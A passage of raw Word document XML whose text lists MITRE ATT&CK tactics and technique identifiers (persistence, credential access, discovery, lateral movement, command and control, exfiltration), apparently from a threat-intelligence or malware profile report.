    <w:p w14:paraId="47E575B6"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T1059.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E19664"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0003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Persistence ['T1098', 'T1574.002', 'T1078.002', 'T1543.003', 'T1547.001', 'T1546.008', 'T1136.001', 'T1053.005']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11535AEA"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1098 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Account Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D37BA7"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T1574.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:DLL Side-Loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3B9BCB"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T1078.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Domain Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D4AAB0"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T1543.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Create or Modify System Process&gt;:Windows Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A50A03"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T1547.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7DFA65"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T1546.008 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Event Triggered Execution&gt;:Accessibility Features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FBBE58"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T1136.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Create Account&gt;:Local Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C22503"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T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B12C546"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0004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Privilege Escalation ['T1574.002', 'T1078.002', 'T1543.003', 'T1547.001', 'T1546.008', 'T1053.005']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A26D876"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T1574.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:DLL Side-Loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4AEC08"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T1078.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Domain Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484D951F"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T1543.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Create or Modify System Process&gt;:Windows Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635E922A"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T1547.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1A2F2C"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T1546.008 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Event Triggered Execution&gt;:Accessibility Features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9083A1"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T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C166664"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0005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Evasion ['T1564.003', 'T1027.002', 'T1027.005', 'T1574.002', 'T1078.002', 'T1027', 'T1070.004', 'T1218.011']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0262FF4C"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T1564.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hide Artifacts&gt;:Hidden Window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE8A88E"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T1027.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obfuscated Files or Information&gt;:Software Packing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A970DEE"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T1027.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obfuscated Files or Information&gt;:Indicator Removal from Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFE32BC"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T1574.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:DLL Side-Loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65ED36E1"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T1078.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Domain Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585F34BF"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1027 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Obfuscated Files or Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57776983"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T1070.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Indicator Removal on Host&gt;:File Deletion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B17B689"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T1218.011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;System Binary Proxy Execution&gt;:Rundll32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C2677B"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0006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Credential Access ['T1555.003', 'T1110.002', 'T1552.001', 'T1056.001', 'T1003.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7808BEFC"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T1555.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Credentials from Password Stores&gt;:Credentials from Web Browsers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0293B992"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T1110.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Brute Force&gt;:Password Cracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7842B86E"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T1552.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Unsecured Credentials&gt;:Credentials In Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AA3C1D"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T1056.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Input Capture&gt;:Keylogging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D10185"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T1003.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;OS Credential Dumping&gt;:LSASS Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3834351E"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0007 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Discovery ['T1082', 'T1069', 'T1057', 'T1049', 'T1018', 'T1083', 'T1016', 'T1087.001', 'T1033']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E685A8"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lastRenderedPageBreak/>
        <w:t>Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1082 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Information Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A25BFE"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1069 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Permission Groups Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAFF091"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1057 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Process Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AACEDF2"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1049 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Network Connections Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5731661B"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1018 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Remote System Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D270A21"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1083 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> File and Directory Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBC522D"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1016 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Network Configuration Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA97F69"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T1087.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Account Discovery&gt;:Local Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D89AABF"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1033 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Owner/User Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356845CB"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0008 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Lateral Movement ['T1021.002', 'T1021.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4A3F81"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T1021.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Remote Services&gt;:SMB/Windows Admin Shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477331FF"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T1021.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Remote Services&gt;:Remote Desktop Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2951E079"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0009 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Collection ['T1074.001', 'T1005', 'T1560.001', 'T1056.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451D5DD2"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T1074.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Data Staged&gt;:Local Data Staging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A50F4B"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1005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Data from Local System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61486718"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T1560.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Archive Collected Data&gt;:Archive via Utility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A7DC0F"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T1056.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Input Capture&gt;:Keylogging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB20B36"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0011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Command and Control ['T1090.002', 'T1105', 'T1095', 'T1104']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C64CF57"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 xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1090.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Proxy&gt;:External Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02730358"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1105 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1153E611"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1095 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Non-Application Layer Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AADDC43"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1104 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Multi-Stage Channels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE7EF1F" w14:textId="77777777" w:rsidR="00AF3C09" w:rsidRPr="00AF3C09"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0010 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltration ['T1041']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECD70F9" w14:textId="77777777" w:rsidR="00AF3C09" w:rsidRPr="00AF3C09" w:rsidRDefault="00AF3C09" w:rsidP="00A7178D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1041 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltration Over C2 Channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700F649F" w14:textId="7A73CBD5" w:rsidR="00AF3C09" w:rsidRPr="005935F8" w:rsidRDefault="00AF3C09" w:rsidP="00A7178D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF3C09">
